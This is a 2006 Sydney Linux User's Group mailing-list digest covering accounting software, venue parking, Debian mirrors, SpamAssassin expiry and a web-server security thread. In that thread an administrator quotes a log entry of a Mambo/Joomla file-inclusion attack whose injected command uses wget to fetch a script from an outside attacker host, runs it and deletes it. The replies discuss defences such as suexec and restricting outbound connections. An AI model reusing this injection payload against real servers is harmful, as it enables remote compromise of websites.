Re: [SLUG] Contracting stuff: wrap it into a company or PAYE through agency?
On Wed, 2006-09-27 at 14:54 +1000, Howard Lowndes wrote: Gavin Carr wrote: On Wed, Sep 27, 2006 at 12:28:16PM +1000, Jacinta Richardson wrote: Rev Simon Rumble wrote: That sounds doable. What accounting package, if you don't mind? We use gnucash, but SQL Ledger ( http://www.sql-ledger.org/ ) has been getting press. We were toying with the idea of moving over, but we haven't yet. I'm a SQL Ledger user too, but there's been an interesting fork in the project in the last month to six weeks, due to the perceived lack of openness and responsiveness of SQL Ledger's author. So you might want to check out http://www.ledgersmb.org/ as well if you're considering moving. This is both an interesting and concerning twist that I was not aware of. Do you have any further info other than the link? There was a lot of gnashing of teeth about a perceived security hole in SQL-Ledger. Two guys posted notice of the hole but the author did not appear to do anything about it, so a couple of weeks ago they decided to write their own fix and fork. The author of SQL-Ledger basically writes the entire package on his own under GPL and sells support and documentation to make money. He is very active developing SQL-Ledger, but I have to say that he has very poor human communication skills. It will be very interesting to see if the fork has legs. So far I'm sticking to the SQL-Ledger version, but there is some very interesting chatter on the ledgersmb mailing list, so it will be a space worth watching. I guess it's a classic GPL fork situation. Cheers, Gavin -- Howard. LANNet Computing Associates - Your Linux people http://lannetlinux.com When you want a computer system that works, just choose Linux; When you want a computer system that works, just, choose Microsoft. -- Flatter government, not fatter government; abolish the Australian states. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] dumb user check tool ?
This one time, at band camp, Voytek Eymont wrote: I have a LAMP server with several vhosts, some of the users now install/run their own CMSs, what sort of tools/checks are there I can use to attempt to protect the server ? (rather than, as I currently do, relay on sheer luck) What hosting company was that? :-) is there anything I can do assess for various user-dumbness occurences ?? Turn on mod_suexec and don't run mod_php. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] d/l illicit files: wget, curl, what else ?
apart from wget and curl, what else can be used to download illicit files to a web server ? what other stuff should I look for in the web logs ? from web log: GET /index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0 200 167 - Mozilla/5.0 -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Erik -- +---+ Erik de Castro Lopo +---+ There is no reason why anyone would want a computer in their home Ken Olson, DEC, 1977 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] Parking at the new venue
Hi All, Is there any parking near the new venue? If so, where and at what cost? TIA Ashley -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, Sep 27, 2006 at 08:54:04PM +1000, Voytek Eymont wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? what other stuff should I look for in the web logs ? from web log: GET /index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0 200 167 - Mozilla/5.0 This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512. It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about. -Andrew. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Eric, I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 12:18 am, Andrew Bennetts wrote: This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512. It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about. thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... I know little of Mambo/Joomla, any idea how can I find out level of installed version ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, 28 Sep 2006 08:33:47 +1000 (EST) Voytek Eymont [EMAIL PROTECTED] wrote: Eric, Who's this Eric guy? :-) I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits In Perl, Python and Ruby writing a simple app that does what wget does is no more than 10 lines of really trivial code. I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? No. it won't. You need to run this in a chroot jail or a User Mode Linux or something like that. if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? Its goes such a small way to solving the problem that its probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions. Erik +---+ Erik de Castro Lopo +---+ Microsoft is finally bringing all of its Windows operating system families under one roof. It will combine all of the features of CE, stability and support of ME and the speed of NT. It will be called Windows CEMENT... -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote: On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.Eric,I guess I meant 'single-purpose utilities that can be easily expoited likeso' :'some_app file_url'through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, nexttimea cms has such an expoitable hole, I'll reduce my exposure, no ??I would think that depended entirely on the exploitable hole; even if you get rid of those utilities, there will be ways within perl/php/language-of-choice to download things; if the exploitable hole makes those available, you're no better off for having removed those utilities. if I remove or rename wget/curl/lynx/links from my server, apart fromocassional inconvience to me, that won't cause me issues ? I think it would cause more inconvenience than you realise. I'm not sure what Apt or up2date use, but I know that utilities such as CPAN will try to use wget/curl/links/lynx in order to download updates; you'll probably find that a lot of other systems that have the ability to look for updates do as well. Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though. I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file. --Voytek--SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html-- There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] October 3rd meeting of the Sydney PostgreSQL Users Group
The Sydney PostgreSQL Users Group will meet on the 3rd of October 2006 at Fujitsu Australia in North Sydney at 6:30pm. Charles Duffy will be giving a comprehensive over view of point in time recovery (PITR) which provides a mechanism for disaster recovery and high availability. Importantly, he will be introducing functionality in PostgreSQL 8.2 which greatly increases the usefulness of PITR. Meet Gavin Sherry and Charles Duffy at the foyer of 15 Blue St North Sydney at 6:30pm. The meeting will be held in a meeting room on level 19 but security restrictions mean that you cannot go straight up there. As such, please try and arrive promptly. If you have any issues, contact Gavin on 0418487420. You can see a map of approximately where the buillding is here http://www.zoomin.com.au/australia/nsw/sydney/north+sydney/blue+street/ You can see this message here: http://pugs.postgresql.org/sydpug/archives/72.html Thanks, Gavin -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote: thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches. One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine. Erik -- +---+ Erik de Castro Lopo +---+ Hundreds of thousands of people couldn't care less about Kylix and what it runs on. It's there for the dying breed of die-hard Pascal fanatics who missed their 20 year window to migrate to C and C++. -- Kaz Kylheku in comp.os.linux.development.apps -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?
* On Tue, Sep 26, 2006 at 05:10:05PM +1000, Penedo wrote: 1. Apparently the Debian mirrors are disappearing - first on Optus and last night apparently also on iiNet. Does anyone know what's going on? (I'd ask this on debian-au but according to its archive this list seems to be dead since March). Presuming that decisions at ISPs aren't totally random (I know, a very strong assumption) Debian mirrors are being removed because volume of traffic vs space can't be justified. Perhaps Ubuntu usage is really encroaching on Debian? -- Sonia Hamilton. GPG key A8B77238. . One OS to rule them all, One OS to find them. One OS to call them all, And in salvation bind them. In the bright land of Linux, Where the hackers play. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?
quote who=Sonia Hamilton * On Tue, Sep 26, 2006 at 05:10:05PM +1000, Penedo wrote: 1. Apparently the Debian mirrors are disappearing - first on Optus and last night apparently also on iiNet. Does anyone know what's going on? (I'd ask this on debian-au but according to its archive this list seems to be dead since March). Presuming that decisions at ISPs aren't totally random (I know, a very strong assumption) Debian mirrors are being removed because volume of traffic vs space can't be justified. Perhaps Ubuntu usage is really encroaching on Debian? More likely: A server that has (for whatever reason) managed to delete their debian mirror will impact downstream mirrors if/when they rsync --delete. - Jeff -- linux.conf.au 2007: Sydney, Australia http://lca2007.linux.org.au/ IMO we should end the thread based on that; configurability is always the best choice when it's pretty simple to implement. - Havoc Pennington, 1998 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] UC Berkeley offers free courses and symposia through Google Video
I know how my Berkeley education shaped how I view the world, and now more people will be able to have the Berkeley experience. Move over Fox News - now people can watch Physics for Future Presidents on Google Video, Healy said. Ahh, broadband ... Fyi, Adam Bogacki. http://www.berkeley.edu/news/media/releases/2006/09/26_google.shtml -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote: [ .. ] if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? Its goes such a small way to solving the problem that its probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions. I wonder if the best bang for buck is perhaps just have a iptables rule to prevent outgoing connections for the user running apache. Or will this potentially kill those new fancy schmancy ajax/web2 apps. Matt -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Debian mirrors disappearing and reporting spam on list archive?
On 28/09/06, Jeff Waugh [EMAIL PROTECTED] wrote: More likely: A server that has (for whatever reason) managed to delete theirdebian mirror will impact downstream mirrors if/when they rsync --delete.Which is apparently what happened - the main server off of which everyone in Australia are mirroring lost a disk. The mirrors are pretty much back in place as of this morning. Also to the dude to said he uses the NZ mirrors - check your tcptraceroute - from iiNet to NZ I get a route through the US.Cheers,--P -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Matthew Hannigan [EMAIL PROTECTED] wrote: I wonder if the best bang for buck is perhaps just have a iptablesrule to prevent outgoing connections for the user running apache.Or will this potentially kill those new fancy schmancy ajax/web2 apps. It won't kill anything ajaxified, as those things still rely on the browser opening connections to the server.-- There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:42 am, Zhasper wrote: On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote: Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though. yes, I realize that, though, i feel it's still better to 'do something' I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file. yes, of course, though, it's clear this user's apparent skills don't extend to security consideration... -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Voytek Eymont wrote: On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Eric, I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? perl -MLWP -e 'GET url' or somesuch :) You want to remove perl too? Configuring apache to run the potentially vulnerable code in a security domain with minimum rights is going to let you sleep better than removing random tools. Sure, minimise the options an attacker has, defense in depth and all that. Start at the bottom of the network stack and start securing yourself from there, then up through the application layer, then once you're inside the application itself, partition execution contexts so that the stuff you don't trust (i.e. the CMS) when hacked doesn't have the opportunity to damage your system, then they'll pop up like sore thumbs when it does happen, and make for easier analysis of attack vector. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Erik de Castro Lopo wrote: Voytek Eymont wrote: thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches. One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine. chroot/UML/Xen is not the hammer for this screw :) Anchor has survived for 6 years without a root compromise, allowing customers to install their own buggy unpatched versions of code, and all running on an unvirtualised machine. You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 28 Sep 2006, Jamie Wilkinson [EMAIL PROTECTED] wrote:
This one time, at band camp, Voytek Eymont wrote:
On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote:
apart from wget and curl, what else can be used to download illicit
files to a web server ?
Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language.
Also programs like lynx.
Eric,
I guess I meant 'single-purpose utilities that can be easily expoited like
so' :
'some_app file_url'
through a web server vulnerability to easily deposit exploits
I'm guessing that if I do NOT have wget/curl/lynx/links available, next
time a cms has such an expoitable hole, I'll reduce my exposure, no ??
Voytek,
Perhaps it's just me but I don't understand *where* and *by whom* you
are trying to prevent them being executed.
You can't (obviously) control what is run by random people on the
internet who are attacking your machine. You can try to filter by the
User-Agent string to block requests from those programs, but that is
trivial to spoof, and regularly spoofed by attack tools. See e.g.
http://www.metasploit.com/
If an attacker has control of your machine you have more serious
problems than whether they can run wget or not.
Similarly if your users are running vulnerable software you should just
fix that rather than worrying about wget...
perl -MLWP -e 'GET url'
or somesuch :) You want to remove perl too?
And in php something like open('http://ubuntu.com/') may work too,
depending on the configuration.
--
Martin
--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] Spamassassin
Hi list,My e-mail isn't getting through to the mail box.Syslog keeps showing bayes: expire_old_tokens: child processing timeout.After Googling I've found a comment that suggests a manual Bayes expire run but doesn't go on to describe how to do it. Has anyone struck this before and how do I sort it, please?TIAJohn -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Spamassassin
On 28/09/2006, at 12:27 PM, John wrote: Hi list, My e-mail isn't getting through to the mail box. Syslog keeps showing bayes: expire_old_tokens: child processing timeout. After Googling I've found a comment that suggests a manual Bayes expire run but doesn't go on to describe how to do it. Has anyone struck this before and how do I sort it, please? TIA John Hi John, While spamassassin is expiring old records from the bayesian database, it can't be used for filtering. Basically spamd/spamc will have to wait until the expire is finished before they can process any pending messages - hence the timeouts. To do manual expire run: sa-learn --force-expire --sync When that's done, you should see something like this: expired old bayes database entries in 14 seconds 160491 entries kept, 165910 deleted token frequency: 1-occurrence tokens: 58.52% token frequency: less than 8 occurrences: 24.85% You may need to wrap up the sa-learn in su so that your expire run uses the same user as the normal spamassassin process. Running as root might leave some files with root-only permissions which will break normal scanning etc. (seen this on FreeBSD) plus if you're doing per-user spamassassin bayes corpus, running as root wont pick up the user-specific bayes data. Cheers, James -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 11:45:17AM +1000, Jamie Wilkinson wrote: You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec. Speaking of mods, http://www.modsecurity.org/ might well prevent a lot of badness. I don't know whether the administration involved in a complex isp hosting situation would be worth it though. (me googles) in http://www.cerias.purdue.edu/weblogs/coj/secure-it-practices/post-37/ Ed Finkler says: mod_security is an essential tool for securing any apache-based hosting environment So who am I to argue :-) FWIW, there's also a post on this Mambo/Joomla worm: http://www.cerias.purdue.edu/weblogs/coj/infosec-education/post-11/ Matt -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Parking at the new venue
On 27 Sep 2006, Ashley [EMAIL PROTECTED] wrote: Hi All, Is there any parking near the new venue? If so, where and at what cost? There's some multi-story carparks provided by the City of Willoughby off Willoughby Road; I think this will be free at that time. That's about 600m from IBM. Otherwise there is a lot of on-street parking, but much of it will be metered on Friday night. -- Martin -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Parking at the new venue
On Thu, Sep 28, 2006 at 01:49:43PM +1000, Martin Pool wrote: On 27 Sep 2006, Ashley [EMAIL PROTECTED] wrote: Hi All, Is there any parking near the new venue? If so, where and at what cost? There's some multi-story carparks provided by the City of Willoughby off Willoughby Road; I think this will be free at that time. That's about 600m from IBM. Otherwise there is a lot of on-street parking, but much of it will be metered on Friday night. Last month there was loads of street parking in Chandos St which is nice and close. From memory it wasn't metered after 6pm. Well at least I didn't put any money in the meter anyway. -- John http://www.inodes.org/ -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
[SLUG] Re: September SLUG Monthly Meeting
On Tue, 2006-09-19 at 10:10 +1000, Lindsay Holmwood wrote: General Talk: Conrad Parker ... It will be Conrads last SLUG meeting for at least 3 years as he's leaving to study in Japan a few days after the meeting. Sayonara! So be sure to wear something plaid tomorrow night... http://research.operationaldynamics.com/blogs/andrew/#slug-plaid-for-kfish :) AfC Sydney -- Andrew Frederick Cowie Technology strategy, managing change, establishing procedures, and executing successful upgrades to mission critical business infrastructure. http://www.operationaldynamics.com/ Sydney New York Toronto London signature.asc Description: This is a digitally signed message part -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] Parking at the new venue
On 9/28/06, John Ferlito [EMAIL PROTECTED] wrote: Last month there was loads of street parking in Chandos St which is nice and close. From memory it wasn't metered after 6pm. Well at least I didn't put any money in the meter anyway. Good to know, still hope to someday visit. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
